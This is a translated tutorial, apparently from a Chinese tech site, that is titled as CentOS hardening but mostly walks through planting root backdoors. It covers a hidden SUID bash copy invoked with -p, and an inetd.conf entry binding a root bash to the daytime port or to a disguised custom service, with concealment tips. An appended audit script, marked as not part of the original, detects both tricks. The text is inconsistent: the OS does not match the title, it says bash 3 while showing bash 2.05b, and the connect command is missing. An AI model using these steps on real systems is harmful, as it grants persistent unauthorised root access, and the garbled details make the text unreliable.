2025-02-25 Update From: SLTechnology News&Howtos > Servers
Shulou (Shulou.com) 06/01 Report
This article explains how to prevent a CentOS host from being abused through a SUID shell or an inetd backdoor. Interested readers may want to have a look: the method described here is simple, fast and practical, so let's walk through it together.
The scenario: an attacker already has root on the box and wants to leave a back door.
System environment:
dawg:~# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux
1. SUID shell
First, switch to the root user and execute the following commands:
dawg:~# cp /bin/bash /.woot
dawg:~# chmod 4755 /.woot
dawg:~# ls -al /.woot
-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot
Of course, any other less conspicuous name works just as well; you can no doubt think of plenty. The leading "." in the name is not required; it only hides the file from a plain directory listing (a file whose name starts with "." is hidden in any directory).
Now, as a regular user, try running this backdoor:
fw@dawg:~$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
fw@dawg:~$ /.woot
.woot-2.05b$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
.woot-2.05b$
Why did the effective uid not change?
Because bash 3 has some protection against being run SUID: it drops the elevated effective uid on startup. That protection can be bypassed, though:
.woot-2.05b$ /.woot -p
.woot-2.05b# id
uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)
Use the -p parameter to keep the privileges and get a root shell. "euid" stands for effective user id.
Note that when executing this SUID shell as an ordinary user, you must use the full path.
A little background knowledge:
How to find files with the SUID bit set:
dawg:~# find / -perm +4000 -ls
This lists every file that has the SUID bit.
2. Remote backdoor: abusing /etc/inetd.conf
We use vi to modify the /etc/inetd.conf file.
Original file:
# chargen dgram udp wait root internal
# discard stream tcp nowait root internal
# discard dgram udp wait root internal
# daytime stream tcp nowait root internal
Modified to:
# discard stream tcp nowait root internal
# discard dgram udp wait root internal
daytime stream tcp nowait root /bin/bash bash -i
Start inetd:
dawg:~# inetd
If inetd is already running, make it reload its configuration instead:
dawg:~# ps -ef | grep inetd
root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetd
root 13769 13643 0 17:51 pts/1 00:00:00 grep inetd
dawg:~# kill -HUP 362
Now the backdoor can be reached with nc:
C:\tools>
192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.77] 13 (daytime) open
bash: no job control in this shell
bash-2.05b#
bash-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
bash-2.05b# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux
Tips:
The /etc/services file can also be modified to add an entry such as:
woot 6666/tcp # evil backdoor service
Then add the matching line to /etc/inetd.conf:
woot stream tcp nowait root /bin/bash bash -i
The service can just as well be put on a commonly used port to make it less conspicuous.
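As an added defender-side example (not part of the original article), the following POSIX sh functions audit a host for the two tricks described above: inetd.conf entries that hand a socket to a shell, and SUID files that are byte-for-byte copies of a system shell. Function names are my own; the script assumes awk, find and cmp are available and reads /etc/shells only as an optional default list of reference shells.

```shell
#!/bin/sh
# Added audit example: flags the two persistence tricks described above.
# Assumes a POSIX sh with awk, find and cmp; /etc/shells is optional.

# Print non-comment inetd.conf entries whose server program, or whose
# argv[0], is a shell (e.g. "daytime ... root /bin/bash bash -i").
# Field layout: service socket-type protocol wait/nowait user program args...
suspicious_inetd_entries() {
    conf="${1:-/etc/inetd.conf}"
    [ -r "$conf" ] || return 0
    awk '
        /^[ \t]*#/ || NF < 6 { next }
        $6 ~ shell || $7 ~ shell { print }
    ' shell='(^|/)(ba|da|k|z|c|a)?sh$' "$conf"
}

# Print SUID regular files under DIR that are exact copies of one of the
# reference shells (remaining args; default: every entry in /etc/shells).
# -perm -4000 works on old and new findutils, unlike the article's +4000.
suid_shell_copies() {
    dir="${1:-/}"
    if [ $# -gt 0 ]; then shift; fi
    refs="$*"
    [ -n "$refs" ] || refs=$(grep '^/' /etc/shells 2>/dev/null)
    find "$dir" -xdev -type f -perm -4000 2>/dev/null | while read -r f; do
        for ref in $refs; do
            if [ -f "$ref" ] && cmp -s "$f" "$ref"; then
                echo "$f (copy of $ref)"
                break
            fi
        done
    done
}
```

Run `suspicious_inetd_entries` and `suid_shell_copies /` from a root shell; any output from either deserves a closer look, and the inetd check can be repeated with `/etc/services` in mind, since a renamed service (the "woot" trick) still shows up by its program field.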
At this point, you should have a deeper understanding of how to prevent CentOS from being abused through SUID shells and inetd backdoors. You might as well try it out in practice.